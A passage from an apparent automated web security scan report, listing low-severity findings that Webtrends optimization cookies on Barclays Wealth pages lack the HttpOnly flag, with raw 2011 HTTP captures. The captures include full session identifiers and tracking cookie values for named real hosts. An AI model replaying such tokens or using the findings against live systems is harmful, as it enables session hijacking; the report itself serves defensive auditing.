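Two points worth keeping in mind with this particular stack. First, when auditing a capture taken earlier, compare Expires against the response's Date header rather than the wall clock: the _wt.control cookie above expires on 01-Jan-2012, which was in the future at scan time but is long past now, and judging it by today's date would wrongly drop it from the findings. Second, the X-Powered-By header advertises Servlet 2.5, whose javax.servlet.http.Cookie class has no setHttpOnly method (that arrived in Servlet 3.0), so on this stack the flag has to come from the container's session-cookie configuration or from a Set-Cookie header the application writes itself.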

Request

GET /ots/ots/js-3...[SNIP]... HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/important-information.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A03C4F80BFCFBF92FCB64700ED6E25D0; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d0406738a; _wt.mode-79569=fcdcc722e932043ee114; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00bb0854

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:17 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=6EDFD59FF31DFFC88DA19690B7FF95B4; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d016e163d; Expires=Sun, 01-Jan-2012 00:03:18 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=01c65249; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93203b7c335; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.30. http://ots.optimize.webtrends.com/ots/ots/js-3...[SNIP]...

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3...[SNIP]...

Issue detail

The cookies issued in the response below (see its Set-Cookie headers) do not have the HttpOnly flag set. The JSESSIONID cookie appears to contain a session token, which may increase the risk associated with this issue, because script running in the page (for example through an XSS flaw) can read a non-HttpOnly cookie via document.cookie. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3...[SNIP]... HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/i-alert.htm?WT.mc_id=int_q3_ialert_bwi&WT.mc_ev=click
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6470427122C0BC6EEE06A97043357700; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02420171; _wt.mode-79569=fcdcc722e9320578927c; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05d2312f

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:32 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=9C508F0AF3DD2B4F832C1514175882E4; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d03ba21d2; Expires=Sun, 01-Jan-2012 00:31:33 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=0484ff0a; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e932044d57d7; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.31. http://ots.optimize.webtrends.com/ots/ots/js-3...[SNIP]...

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5605a7f1b5afc5d9b38d752a7fbf8e53656e8a18bdf9f1fd25ae761ed3c7dec882b3b64609e6a6e20dbcfbcdb912759d584f823b5185ca4150ce4959a07dcff5ac53a16139211b0cb556cd69fb48a1dcba5d60771222daaf009b778966d228b012178fdd609edcf90d5924bf310972473f54a1ffc20583ba6b3c76a1733f00ac936579c56bdb60da65a9ef207789fc91bb93a6ca847c3b11dee47cf4582777ca82607b566da1ccb2577e7ff60f776ea0bc0772d236b5b8ef7c1e2c6306ac6e7b88fc498f8daaab51f3745e9cfd5c28b0d1116df17661c831bd959042170df5ec141aebdb6ee4da1566113a43522133d3e922a0e28352de9bb7b79913728403e1c15281ad2f97588dcfce239bd457a9c3ca7557d013f35a7f6b72001451715e97fd4ebcaf31add005285de6850bb18900d4dbe6beaa94189bc67bc88a5750e4331e67ae6a55d2f300c209e966a4d18d3699bf2f63ea793a2f40d8031a415567c002bdfc2155d585655b5e04e1c58d5e789155d17bdb2e54f8000b143498dcebecde1605e281ab74d927a082f6bf90ab82d9882aece0c3162f2099b49da80b9ef92723e536959fdc850cb4e07a2ae8f5bbb99fb74d8dba4897f1e5aa8062a237f493e0e64b07ef078b1038e4a1e3130cb25cf2319900c44de2f764c6bef0421955c4f5e8dd2c504a247d0f349a1e584f8ac7d0ffc7ef1dffb24897265558bae05139d380152ea441b7889a214f8f0ecfc1c9752605ad611539622c584a295ffc7203bbee24d48dadb32b7ce75e446d29e027e632d5af13eabe8b09e7bea262e721b4d2f96441e1d13cedcc2886e635096884c16f43354d3ce803f3443f42d6443b3aa8a9fa44673c2d67295d182706d2f5583be0aea42df2e90a24ef5f7499411aaf594f6d350a430a0cac08f8f1fa08a15f92baf469cd86763b117ee831bd843fb6bfcec42b7e6694189b52213b37c18caff862fa7018105b92a263ab9e60f8b294246f039914cbee6d7decfab539f554220b53b23a13fcbe41e026c2c7e884f68c4aaf14d37a74195c1e1d81799604df4aed9cad925ad8a732f3a49dcd23e31da0ffa645420703b2e6e0f0e024e206e6307ca14f2a980042409206415ff162d62063a86e3414c1f8cb1e15bd2cc689d8a1aacabac0f0bd22d7a4ca40c2451a6000d97dfb62964c0c0a5e8bac6f60f020ab845

Issue detail

The cookies issued in the response below (see its Set-Cookie headers) do not have the HttpOnly flag set. The JSESSIONID cookie appears to contain a session token, which may increase the risk associated with this issue, because script running in the page (for example through an XSS flaw) can read a non-HttpOnly cookie via document.cookie. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3...[SNIP]... HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/brokerage.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1DB1B8506FA734F3D0691621AC32919E; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a025a8920; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02b1d29a; _wt.mode-79569=fcdcc722e93202cf02d7

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:10 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=245968D340BB5968593028CAA74B029E; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e932033a5f6d; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05651019; Expires=Sun, 01-Jan-2012 00:02:11 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.32. http://ots.optimize.webtrends.com/ots/ots/js-3...[SNIP]...

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3...[SNIP]...

Issue detail

The cookies issued in the response below (see its Set-Cookie headers) do not have the HttpOnly flag set. The JSESSIONID cookie appears to contain a session token, which may increase the risk associated with this issue, because script running in the page (for example through an XSS flaw) can read a non-HttpOnly cookie via document.cookie. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3...[SNIP]... HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/about-us.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2D0CE6DA7B82936A31CBC9ACE233AAA7; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; _wt.mode-79569=fcdcc722e93200beff43; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00d8b959

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:06 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=699E9E21874BEC698EE100FEE3749834; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e932047ca940; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a025a8920; Expires=Sun, 01-Jan-2012 00:02:06 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.33. http://ots.optimize.webtrends.com/ots/ots/js-3...[SNIP]...

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3...[SNIP]...

Issue detail

The cookies issued in the response below (see its Set-Cookie headers) do not have the HttpOnly flag set. The JSESSIONID cookie appears to contain a session token, which may increase the risk associated with this issue, because script running in the page (for example through an XSS flaw) can read a non-HttpOnly cookie via document.cookie. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3...[SNIP]... HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/international-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=366C424481F456C6E4820AE57695F69C; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05651019; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d01953baa; _wt.mode-79569=fcdcc722e93200feed40

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:12 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=46EC8A693A8B058A0B9D418F6DDAF0B4; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e93201eda062; Path=/
Set-Cookie: _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200599559; Expires=Sun, 01-Jan-2012 00:02:13 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.34. http://ots.optimize.webtrends.com/ots/ots/js-3...[SNIP]...

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3...[SNIP]...

Issue detail

The cookies issued in the response below (see its Set-Cookie headers) do not have the HttpOnly flag set. The JSESSIONID cookie appears to contain a session token, which may increase the risk associated with this issue, because script running in the page (for example through an XSS flaw) can read a non-HttpOnly cookie via document.cookie. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3...[SNIP]... HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/barclays-infinite-credit-card.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=DF89E5BAA7A71BDFFD734919F4B8C6D8; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200988e87; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d04610a68; _wt.mode-79569=fcdcc722e93202c8abcc

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:18 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=4274AF1E58216E26E0C3901397ECB67E; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e932029c8164; Path=/
Set-Cookie: _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2008dfa14; Expires=Sun, 01-Jan-2012 00:02:19 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.35. http://ots.optimize.webtrends.com/ots/ots/js-3...[SNIP]...

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5725a79065efa59d13f9854b8ffb4ff341cffa3c6c9da58c217b271a6094a91e104586061876c763ee9b299bde51a0fdfcafe22b51b43b81151e38bd553d9ab12d86842469408e2c25235d69ff48909d6a1a40767224ad1f142eb09b156138703056de3ff2bcdf6bfed885ff56d970342c76a45c00c442ea6aafb451028e858ac6409ca0ea7ba1aa3549cfe1f7c9fcb1eb83a6dac42c0a61ffc049613d21d3baf2c09e51a9d1cda3830fff136da5cfa5d813450463c1ecda7d2e9d53971c4e5be8dd29cf8d8aab3083f4ee0cececa81041e15c81f6d158200d1530d2e73c856ca48afa6bef559bb3f1057f274626e5869d7695f243e3ff6a47b6697323f483515143f0fc99e12cb8abda344d8123fd373a73000456974ff8bd27744065c04e26ad0fcc2f813dc1b5a92d77e13e144dd4f11e933a595458fb03eedba83077f2a47f279e6f61b6874486c0577b8e5

Issue detail

The cookies issued in the response below (see its Set-Cookie headers) do not have the HttpOnly flag set. The JSESSIONID cookie appears to contain a session token, which may increase the risk associated with this issue, because script running in the page (for example through an XSS flaw) can read a non-HttpOnly cookie via document.cookie. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3...[SNIP]... HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/private-banking.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2D0CE6DA7B82936A31CBC9ACE233AAA7; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; _wt.mode-79569=fcdcc722e93200beff43; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00d8b959

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:06 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=74DD24DA05D7E85933AC1283D8E7C849; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e932037bbb78; Path=/
Set-Cookie: _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2003676f9; Expires=Sun, 01-Jan-2012 00:02:06 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.36. http://ots.optimize.webtrends.com/ots/ots/js-3...[SNIP]...

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3...[SNIP]...

Issue detail

The cookies issued in the response below (see its Set-Cookie headers) do not have the HttpOnly flag set. The JSESSIONID cookie appears to contain a session token, which may increase the risk associated with this issue, because script running in the page (for example through an XSS flaw) can read a non-HttpOnly cookie via document.cookie. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3...[SNIP]... HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/about-us/corporate-social-responsibility.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=93530B2177889BE5371E306CA55F4229; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2008dfa14; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d042f457f; _wt.mode-79569=fcdcc722e93202d188d0

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:06 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
